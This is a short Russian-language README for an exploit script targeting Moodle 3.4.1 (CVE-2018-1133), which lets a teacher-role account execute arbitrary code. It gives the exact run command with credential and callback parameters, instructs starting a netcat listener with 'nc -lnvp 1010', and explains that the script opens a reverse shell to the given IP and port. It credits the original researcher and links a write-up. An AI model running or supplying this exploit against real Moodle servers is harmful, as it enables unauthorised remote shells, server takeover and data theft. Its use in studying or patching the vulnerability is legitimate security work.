
Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133
Пользователь с ролью учителя может выполнять произвольный код.
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
user Имя пользователя учётной записи
pass Пароль от учётной записи
ip IP-адрес для обратного вызова
port Порт для обратного вызова
course Действительный ID курса, принадлежащий учителю
Убедитесь, что вы запустили прослушивание netcat на указанном порту перед выполнением этого скрипта.
nc -lnvp 1010
Это попытается открыть обратную оболочку (reverse shell) на указанные IP-адрес и порт.
Этот эксплойт основан на информации, предоставленной Робином Пералье (Robin Peraglie).
Дополнительное чтение: https://blog.ripstech.com/2018/moodle-remote-code-execution